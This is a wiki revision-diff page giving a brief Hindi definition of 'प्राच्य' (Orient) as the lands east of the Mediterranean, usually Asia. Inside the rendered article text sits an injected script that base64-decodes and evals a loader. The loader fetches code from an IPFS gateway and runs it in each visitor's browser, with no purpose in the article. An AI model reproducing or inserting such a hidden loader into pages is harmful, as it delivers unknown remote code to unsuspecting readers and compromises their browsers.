Difference between revisions of "प्राच्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('* (अंग्रेज़ी: Orient) भूमध्य सागर के पूर्व में स्थित दे...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
* ([[अंग्रेज़ी]]: Orient) [[भूमध्य सागर]] के पूर्व में स्थित देश।
+
* '''प्राच्य''' ([[अंग्रेज़ी]]: Orient) [[भूमध्य सागर]] के पूर्व में स्थित देश।
 
* आमतौर पर यह शब्द [[एशिया]] के लिए इस्तेमाल किया जाता है।  
 
* आमतौर पर यह शब्द [[एशिया]] के लिए इस्तेमाल किया जाता है।  
 
* पश्चिमी नज़रिये में प्राच्य इलाक़े पूर्व- आधुनिक, पारंपरिक और रहस्यमय थे।  
 
* पश्चिमी नज़रिये में प्राच्य इलाक़े पूर्व- आधुनिक, पारंपरिक और रहस्यमय थे।  
Line 7: Line 7:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
 
[[Category:नया पन्ना अगस्त-2011]]
 
[[Category:नया पन्ना अगस्त-2011]]
  
 
__INDEX__
 
__INDEX__

Revision as of 12:52, 31 August 2011

  • prachy (aangrezi: Orient) bhoomadhy sagar ke poorv mean sthit desh.
  • amataur par yah shabd eshiya ke lie istemal kiya jata hai.
  • pashchimi nazariye mean prachy ilaqe poorv- adhunik, paranparik aur rahasyamay the.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh